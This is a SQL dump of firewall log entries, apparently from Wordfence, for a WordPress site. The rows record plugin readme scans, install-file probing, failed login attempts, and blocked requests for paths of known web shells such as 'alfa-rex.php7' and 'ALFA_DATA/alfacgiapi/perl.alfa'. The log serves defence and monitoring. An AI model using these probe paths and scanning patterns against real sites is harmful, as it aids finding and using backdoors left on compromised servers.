(51735, 1712368232.813297, 1712368232.482500, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/cnhk-slideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:72.0) Gecko/20100101 Firefox/72.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbmhrLXNsaWRlc2hvdy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbmhrLXNsaWRlc2hvdy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51736, 1712368251.579857, 1712368251.263900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/woopra/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29wcmEvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29wcmEvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51737, 1712368251.579546, 1712368251.263900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/woopra/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29wcmEvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29wcmEvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51817, 1712406460.516240, 1712406460.161600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/RxRtclyi.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL1J4UnRjbHlpLnBocA==","category":"brute-force","ssl":1}'),
(51738, 1712368250.385575, 1712368249.992400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/simple-ads-manager/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.39', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtYWRzLW1hbmFnZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtYWRzLW1hbmFnZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51835, 1712426003.406872, 1712426003.112300, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/web/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51836, 1712426001.510175, 1712426001.237300, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/cms/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51837, 1712425999.484179, 1712425999.193100, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/blog/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51856, 0.000000, 1712468830.350399, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜9€', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51857, 0.000000, 1712471247.665987, '\0\0\0\0\0\0\0\0\0\0ÿÿxã¡', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51858, 0.000000, 1712472682.872575, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¤\Z', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51859, 0.000000, 1712491753.013761, '\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ét', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51860, 0.000000, 1712496083.767739, '\0\0\0\0\0\0\0\0\0\0ÿÿ1Íi„', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51992, 1712689410.034977, 1712689409.566400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/cloud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocA==","category":"brute-force","ssl":1}'),
(51852, 0.000000, 1712447539.612295, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51814, 1712406466.926731, 1712406466.547700, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(51750, 1712368256.131475, 1712368255.747900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wpshop/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A546B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHNob3AvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHNob3AvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50918, 1712082522.887538, 1712082521.324400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(51723, 1712368229.434348, 1712368229.014700, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/asset-manager/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:85.0) Gecko/20100101 Firefox/85.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3NldC1tYW5hZ2VyL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3NldC1tYW5hZ2VyL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50700, 1711810306.020173, 1711810305.724800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/alfa-rex.php7', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmEtcmV4LnBocDc=","category":"brute-force","ssl":1}'),
(50649, 1711731913.670302, 1711731913.267800, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///ebs.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vZWJzLnBocDc=","category":"brute-force","ssl":1}'),
(50834, 1712011453.407992, 1712011453.056600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/epinyins.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2VwaW55aW5zLnBocA==","category":"brute-force","ssl":1}'),
(50807, 1712000148.707335, 1712000147.811900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(50718, 1711858484.938876, 1711858483.649500, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=","category":"brute-force","ssl":1}'),
(50703, 1711810300.852100, 1711810300.543800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/repeater.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50712, 1711816876.554643, 1711816876.172000, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50633, 1711731940.819183, 1711731940.453700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/images/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vaW1hZ2VzL3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50595, 1711720253.648213, 1711720253.204400, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50605, 1711731994.370731, 1711731993.958500, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/ccx/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL2NjeC9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50716, 1711858476.025842, 1711858474.956700, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/ALFA_DATA/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==","category":"brute-force","ssl":1}'),
(50643, 1711731922.682111, 1711731922.238400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/classic-editor/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL2NsYXNzaWMtZWRpdG9yL3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50637, 1711731935.169249, 1711731934.764100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///css/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vY3NzL3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50707, 1711810292.193230, 1711810291.790100, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-includes/js/tinymce/skins/lightgray/img/index.php?p=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL2pzL3RpbnltY2Uvc2tpbnMvbGlnaHRncmF5L2ltZy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50638, 1711731933.679825, 1711731933.271600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///cgi-bin/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vY2dpLWJpbi94bXJscGMucGhw","category":"brute-force","ssl":1}'),
(50713, 0.000000, 1711829539.240787, '\0\0\0\0\0\0\0\0\0\0ÿÿx„c1', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'loginFailInvalidUsername', NULL, NULL),
